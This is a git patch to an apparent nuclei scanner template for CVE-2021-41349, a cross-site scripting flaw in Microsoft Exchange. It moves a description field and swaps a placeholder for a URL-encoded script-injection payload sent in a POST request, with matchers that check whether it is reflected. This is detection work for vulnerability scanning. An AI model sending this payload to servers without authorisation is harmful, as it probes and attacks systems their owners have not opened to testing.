From 0e9faf2419857e6c9c4327c757f476917e241bba Mon Sep 17 00:00:00 2001
From: sandeep <sandeep@projectdiscovery.io>
Date: Sat, 13 Nov 2021 00:37:40 +0530
Subject: [PATCH] misc updates

---
 cves/2021/CVE-2021-41349.yaml | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/cves/2021/CVE-2021-41349.yaml b/cves/2021/CVE-2021-41349.yaml
index 81a6515656..225d1a6a33 100644
--- a/cves/2021/CVE-2021-41349.yaml
+++ b/cves/2021/CVE-2021-41349.yaml
@@ -5,6 +5,7 @@ info:
   author: rootxharsh,iamnoooob
   severity: medium
   tags: cve,cve2021,xss,microsoft,exchange
+  description: Microsoft Exchange Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-42305.
   reference:
     - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349
     - https://nvd.nist.gov/vuln/detail/CVE-2021-41349
@@ -13,7 +14,6 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
     cvss-score: 6.50
     cve-id: CVE-2021-41349
-  description: "Microsoft Exchange Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-42305."
 
 requests:
   - raw:
@@ -22,13 +22,15 @@ requests:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        <HTTPVOID>&x=1
+        %3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - '="<HTTPVOID>'
+          - 'alert(document.domain);'
+          - 'a=""'
+        condition: and
 
       - type: word
         part: header